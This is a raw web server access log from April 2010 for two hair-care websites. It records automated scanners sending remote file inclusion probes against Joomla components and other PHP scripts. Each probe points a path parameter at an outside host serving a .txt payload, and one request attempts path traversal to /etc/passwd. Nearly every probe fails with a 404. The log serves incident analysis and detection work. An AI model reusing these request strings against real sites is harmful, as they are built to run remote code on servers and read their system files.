78.110.50.120 - - [25/Apr/2010:20:09:16 -0700] "GET /option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [25/Apr/2010:20:09:16 -0700] "GET /logs//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [25/Apr/2010:20:09:16 -0700] "GET /logs/access.log%20%20//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.251.103.3 - - [25/Apr/2010:20:12:25 -0700] "GET /logs/access_091123.log//com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
125.251.103.3 - - [25/Apr/2010:20:12:25 -0700] "GET /com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
125.251.103.3 - - [25/Apr/2010:20:12:26 -0700] "GET /logs//com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.195.112.151 - - [25/Apr/2010:20:13:50 -0700] "GET /logs/access_090810.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:20:17:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:20:17:41 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:20:17:41 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:20:17:55 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:19:59 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [25/Apr/2010:20:19:59 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [25/Apr/2010:20:19:59 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.231.60.209 - - [25/Apr/2010:20:21:15 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:15 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:29 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:37 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:37 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:21:54 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.80.122.44 - - [25/Apr/2010:20:24:06 -0700] "GET /logs/access_100315.log//spaw/spaw_control.class.php?spaw_root=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [25/Apr/2010:20:24:06 -0700] "GET /spaw/spaw_control.class.php?spaw_root=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [25/Apr/2010:20:24:06 -0700] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
110.164.215.130 - - [25/Apr/2010:20:25:11 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [25/Apr/2010:20:25:11 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [25/Apr/2010:20:25:11 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [25/Apr/2010:20:33:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:40:58 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.231.60.209 - - [25/Apr/2010:20:41:14 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:14 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:21 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:21 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:38 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [25/Apr/2010:20:41:45 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.10 - - [25/Apr/2010:20:45:50 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 1507328 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:47:38 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:47:38 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:47:38 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.165.225 - - [25/Apr/2010:20:48:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:51:14 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [25/Apr/2010:20:55:18 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:55:18 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:55:18 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:06 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:06 -0700] "GET /skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:06 -0700] "GET /logs//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:12 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:12 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:12 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:37 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:38 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/ask_password.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:40 -0700] "GET /skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:40 -0700] "GET /logs//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:20:56:40 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:59:06 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:59:06 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [25/Apr/2010:20:59:06 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:21:00:09 -0700] "GET /skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:21:00:09 -0700] "GET /logs//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [25/Apr/2010:21:00:10 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?error=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:20 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:20 -0700] "GET /logs/access.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:20 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:28 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:28 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:28 -0700] "GET /logs/access_100329.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:28 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:02:58 -0700] "GET /logs/access_100419.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:03:13 -0700] "GET /logs/access_100329.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:03:13 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:03:13 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:03:35 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:03:35 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:03:35 -0700] "GET /logs/access_100329.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /logs/access.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /logs/access.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:39 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:46 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:03:46 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /logs/access_100329.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:01 -0700] "GET /logs/access_100329.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:04:03 -0700] "GET /logs/access_100419.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:34 -0700] "GET /logs/access_100419.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:04:36 -0700] "GET /logs/access_100419.log//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:05:45 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:05:45 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:05:45 -0700] "GET /logs/access.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
